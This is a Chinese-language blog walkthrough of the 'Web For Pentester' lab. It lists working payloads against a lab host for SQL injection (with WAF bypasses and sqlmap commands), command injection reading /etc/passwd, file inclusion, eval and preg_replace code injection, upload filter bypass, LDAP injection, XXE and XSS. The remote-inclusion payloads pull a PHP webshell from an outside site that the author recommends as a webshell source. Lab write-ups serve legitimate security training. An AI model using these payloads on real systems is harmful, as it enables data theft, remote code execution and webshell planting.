NEKO

Web For Pentester

2017/12/21

sqli

参考:
http://lyx.dropsec.xyz/2015/06/20/sql%E6%B3%A8%E5%85%A5%E4%B9%8Btamper%E7%BB%95%E8%BF%87WAF%EF%BC%8C%E5%AE%89%E5%85%A8%E7%8B%97/
http://www.atomsec.org/%E5%AE%89%E5%85%A8/web_for_pentester_i-part-1/

ex1

闭合:’
可用注释符:–+,– -,%23

payload:

手注

判断column数目:
http://10.10.10.156/sqli/example1.php?name=root' order by 6%23
爆库:
http://10.10.10.156/sqli/example1.php?name=' union select 1,2,database(),4,5 %23
数据库名:exercises
爆表:
http://10.10.10.156/sqli/example1.php?name=' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()%23
一个表:users
爆名:
http://10.10.10.156/sqli/example1.php?name=' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name='users'%23
5列: id,name,age,groupid,passwd
爆内容:
http://10.10.10.156/sqli/example1.php?name=' union select groupid,name,passwd,4,5 from users%23

sqlmap

kali64
爆库:
sqlmap -u http://10.10.10.156/sqli/example1.php?name=root --dbs

爆表:
sqlmap -u http://10.10.10.156/sqli/example1.php?name=root -D exercises --tables

爆列:
sqlmap -u http://10.10.10.156/sqli/example1.php?name=root -D exercises -T users --columns

爆内容:
sqlmap -u http://10.10.10.156/sqli/example1.php?name=root -D exercises -T users --dump

ex2

闭合:’
可用注释符:%23
waf:空格 (判断方法:’%23正常,’ %23不正常)
绕waf:
可行:/**/,%09(\t)
不可行:%20,+,%2B,%0A(\n)
绕waf演示:

1
2
3
'/**/and/**/1=1%23
'or'1'='1'%23
'%09or%091=1%23

payload

手注

把1的空格全换为/**/或%09

sqlmap

要用到tamper
爆库:
sqlmap -u http://10.10.10.156/sqli/example1.php?name=root --dbs --tamper=space2comment.py
space2comment.py可以将空格转换为/**/,通过修改脚本也可做到将空格改为%09

ex3

闭合:’
可用注释符:%23
waf:空格
绕waf:/**/

1
'/**/or/**/1=1%23

payload

手注

同2

sqlmap

同2

ex4

数字型注入:id=2-1
无闭合:id=1 and 1=1#
可用注释符:#,– -,–+,%23

1
id=1 or 1=1%23

payload

ex5

没看出来和4有什么不同

ex6

没看出来和5有什么不同

ex7

数字型注入
无闭合
可用注释符:#
waf:空格
绕waf:%0a

1
id=2%0aor%0a1=1#

payload

参考2

ex8

order by注入
参考:https://www.cnblogs.com/REscan/p/6884278.html
直接排序:order by name
使用符号排序:order by %60name%60
此题属于使用符号排序:order=name%23回显,order=name%23不回显 符号排序无法使用列数进行排序,order by 1%23は無理です

payload

手注

不会

sqlmap

level1是不行的
直接level5
sqlmap -u http://10.10.10.156/sqli/example8.php?order=name%60 --dbs --level5

ex9

此题属于直接排序

payload

手注

写脚本盲注

sqlmap

sqlmap -u http://10.10.10.156/sqli/example9.php?order=name --dbs

Commends Injection

参考:https://securitytraning.com/command-injection-attacks-web-for-pentester/
command1 && command2 先执行command1后执行command2
command1 | command2 只执行command2
command1 & command2 先执行command2后执行command1

ex1

可用;和|和%0a(\n换行) 但|后面要加空格且一次只能执行一个命令

payload

1
2
3
http://10.10.10.156/commandexec/example1.php?ip=127.0.0.1;ls;cat /etc/passwd 
http://10.10.10.156/commandexec/example1.php?ip=127.0.0.1%0als%0acat%20/etc/passwd
http://10.10.10.156/commandexec/example1.php?ip=127.0.0.1| ls

ex2

php正则表达式:http://www.jb51.net/article/36172.htm

只run许ip格式使用了m修正符,此时用换行%0a绕过,这样正则匹配只会匹配第一行。

payload

1
http://10.10.10.156/commandexec/example2.php?ip=127.0.0.1%0als%0acat%20/etc/passwd

ex3


没有使用m修正符,正则匹配会检查整个字符串,换行无法绕过。
官方解释:
This time the preg_match function did a good validation on user’s input. However, the script didn’t stop when evil character is matched in user’s input. Instead of, it only use header function to do a redirection without die function to stop the script.

So the attacking methods (‘;’, ‘&&’ and ‘|’) still works on this one, but it will need a proxy like burpsuite or nc/telnet to read the first response page.

PoC:

Use NC to exploit this vulnerability :

echo -e “GET /commandexec/example3.php?ip=127.0.0.1%26%26id HTTP/1.1\r\nHost: 10.10.10.129\r\nConnection: close\r\n” | nc [yourlab] 80

Using Telnet :-

% telnet [yourlab] 80
GET /commandexec/example3.php?ip=127.0.0.1|uname+-a HTTP/1.0

file include

官方wp:https://securitytraning.com/file-include-vulnerability-web-pentester/

ex1

源码:

1
2
3
if($_GET["page"]){
include($_GET["page"]);
}

最原始的文件包含

本地包含

http://10.10.10.156/fileincl/example1.php?page=../../../../../../etc/passwd

远程包含

各种马:http://file.hackersb.cn
http://10.10.10.156/fileincl/example1.php?page=http://file.hackersb.cn/webshell/php/PHPshell/Antichat%20Shell%20v1.3/Antichat Shell v1.3.php

为所欲为

ex2

源码:

在参数后面加.php,将字节00后面的内容全部过滤掉,就是明摆着使用00截断

本地包含

http://10.10.10.156/fileincl/example2.php?page=../../../../../../etc/passwd%00

远程包含

各种马:http://file.hackersb.cn
http://10.10.10.156/fileincl/example2.php?page=http://file.hackersb.cn/webshell/php/PHPshell/Antichat%20Shell%20v1.3/Antichat Shell v1.3.php%00

code injection

参考:http://wg135.github.io/blog/2016/03/18/pentestlab-web-for-pentester-code-injection/

ex1

源码:

使用了eval()函数

payload

注意闭合即可
http://10.10.10.156/codeexec/example1.php?name=hacker"; system('id'); echo "
或者不闭合后面直接注释掉
http://10.10.10.156/codeexec/example1.php?name=hacker";system('ls');%23
http://10.10.10.156/codeexec/example1.php?name=hacker".system('ls');%23

ex2

源码

1
2
3
4
5
6
7
8
9
10
$order = $_GET["order"];
$result = mysql_query($sql);
if ($result) {
while ($row = mysql_fetch_assoc($result)) {
$users[] = new User($row['id'],$row['name'],$row['age']);
}
if (isset($order)) {
usort($users, create_function('$a, $b', 'return strcmp($a->'.$order.',$b->'.$order.');'));
}
}

payload

使用了匿名函数create_function,闭合掉即可
http://10.10.10.156/codeexec/example2.php?order=id);}system('ls');%23

ex3

源码:

1
2
3
<?php
echo preg_replace($_GET["pattern"], $_GET["new"], $_GET["base"]);
?>

修正符e:
如果设定了此修正符,preg_replace() 在替换字符串中对逆向引用作正常的替换,将其作为 PHP 代码求值,并用其结果来替换所搜索的字符串。
只有 preg_replace() 使用此修正符,其它 PCRE 函数将忽略之。

payload

http://10.10.10.156/codeexec/example3.php?new=system('ls')&pattern=/lamer/e&base=Hello lamer

ex4

源码:

1
2
assert(trim("'".$_GET['name']."'"));
echo "Hello ".htmlentities($_GET['name']);

assert()将检查输入的值,可以通过这个获得代码执行能力。注意trim()的闭合

payload

1
http://10.10.10.156/codeexec/example4.php?name=hacker'.system("ls").'

file upload

ex1

源码:

没有任何检查,可直接上传一句话php
之后菜刀链接即可
也可以直接传个马上去

ex2

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
if(isset($_FILES['image']))
{
$dir = '/var/www/upload/images/';
$file = basename($_FILES['image']['name']);
if (preg_match('/\.php$/',$file)) {
DIE("NO PHP");
}
if(move_uploaded_file($_FILES['image']['tmp_name'], $dir . $file))
{
echo 'Upload done !';
echo 'Your file can be found <a href="/upload/images/'.htmlentities($file).'">here</a>';
}
else
{
echo 'Upload failed';
}
}
?>

过滤了.php,但.phtml也是可执行php文件后缀,将文件后缀名改为.phtml即可

ldap injection

ex1

官方解释:
In this first example, you connect to a LDAP server, using your username and password. In this instance, The LDAP server does not authenticate you, since your credentials are invalid.

However, some LDAP servers authorise NULL Bind: if null values are sent, the LDAP server will proceed to bind the connection, and the PHP code will think that the credentials are correct. To get the bind with 2 null values, you will need to completely remove this parameter from the query. If you keep something like username=&password= in the URL, these values will not work, since they won’t be null; instead, they will be empty.
有些基于ldap的后台容许null通过验证

payload

http://10.10.10.156/ldap/example1.php

ex2

wtf?:
http://10.10.10.156/ldap/example2.php?name=hacker)(cn=*))%00&password=asdfasdf

XML attacks

课程地址:https://www.ichunqiu.com/open/58939
XXE注入:XML External Entity Injection
XML:可扩展标记语言
DTD:文档类型定义(Document Type Definition)
XML实体:
1.普通实体:
用在XML文档中
声明方式:
1.<!ENTITY 实体名 “文本内容”>
2.<!ENTITY 实体名 SYSTEM“外部文件URL地址”>
引用方式:
&实体名
2.参数实体:
只用在DTD 中元素和属性的声明中
声明方式:
1.<!ENTITY %实体名 “文本内容”>
2.<!ENTITY %实体名 SYSTEM“外部文件URL地址”>
引用方式:
&实体名

XXE危害:任意文件读取,URL请求,DDos,远程代码执行(只在php环境中开启expect扩展的前提下)

ex1

payload

http://10.10.10.156/xml/example1.php?xml=%3C%21DOCTYPE%20test%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%3E%5D%3E%3Ctest%3E%26xxe%3B%3C%2ftest%3E
原形式:
http://10.10.10.156/xml/example1.php?xml=<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><test>&xxe;</test>

ex2

orz

payload

http://10.10.10.156/xml/example2.php?name=' or 1=1]%00

XSS

ex1

http://10.10.10.156/xss/example1.php?name=<script>alert('neko')</script>

ex2

http://10.10.10.156/xss/example2.php?name=<img src=x onerror=alert('neko')>

ex3

http://10.10.10.156/xss/example3.php?name=<img src=x onerror=alert('neko')>

ex4

http://10.10.10.156/xss/example4.php?name=<img src=x onerror=alert('neko')>

ex5

过滤了alert,用confirm()和prompt()代替
http://10.10.10.156/xss/example5.php?name=<svg onload=confirm('neko')>
http://10.10.10.156/xss/example5.php?name=<svg onload=prompt('neko')>

ex6

自动加了<script>...</script>(看网页源码)
http://10.10.10.156/xss/example6.php?name=";alert('neko');"

ex7

http://10.10.10.156/xss/example6.php?name=";alert('neko');"

ex8

这个666
http://10.10.10.156/xss/example8.php/"><script>alert('neko')</script>

ex9

http://10.10.10.156/xss/example9.php#<onload=alert(‘xss’)>ie浏览器显示

原文作者: n3k0

发表日期: December 21st 2017, 6:17:53

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. sqli
    1. 1.1. ex1
      1. 1.1.1. payload:
        1. 1.1.1.1. 手注
        2. 1.1.1.2. sqlmap
    2. 1.2. ex2
      1. 1.2.1. payload
        1. 1.2.1.1. 手注
        2. 1.2.1.2. sqlmap
    3. 1.3. ex3
      1. 1.3.1. payload
        1. 1.3.1.1. 手注
        2. 1.3.1.2. sqlmap
    4. 1.4. ex4
      1. 1.4.1. payload
    5. 1.5. ex5
    6. 1.6. ex6
    7. 1.7. ex7
      1. 1.7.1. payload
    8. 1.8. ex8
      1. 1.8.1. payload
        1. 1.8.1.1. 手注
        2. 1.8.1.2. sqlmap
    9. 1.9. ex9
      1. 1.9.1. payload
        1. 1.9.1.1. 手注
        2. 1.9.1.2. sqlmap
  2. 2. Commends Injection
    1. 2.1. ex1
      1. 2.1.1. payload
    2. 2.2. ex2
      1. 2.2.1. payload
    3. 2.3. ex3
  3. 3. file include
    1. 3.1. ex1
      1. 3.1.1. 本地包含
      2. 3.1.2. 远程包含
    2. 3.2. ex2
      1. 3.2.1. 本地包含
      2. 3.2.2. 远程包含
  4. 4. code injection
    1. 4.1. ex1
      1. 4.1.1. payload
    2. 4.2. ex2
      1. 4.2.1. payload
    3. 4.3. ex3
      1. 4.3.1. payload
    4. 4.4. ex4
      1. 4.4.1. payload
  5. 5. file upload
    1. 5.1. ex1
    2. 5.2. ex2
  6. 6. ldap injection
    1. 6.1. ex1
      1. 6.1.1. payload
    2. 6.2. ex2
  7. 7. XML attacks
    1. 7.1. ex1
      1. 7.1.1. payload
    2. 7.2. ex2
      1. 7.2.1. payload
  8. 8. XSS
    1. 8.1. ex1
    2. 8.2. ex2
    3. 8.3. ex3
    4. 8.4. ex4
    5. 8.5. ex5
    6. 8.6. ex6
    7. 8.7. ex7
    8. 8.8. ex8
    9. 8.9. ex9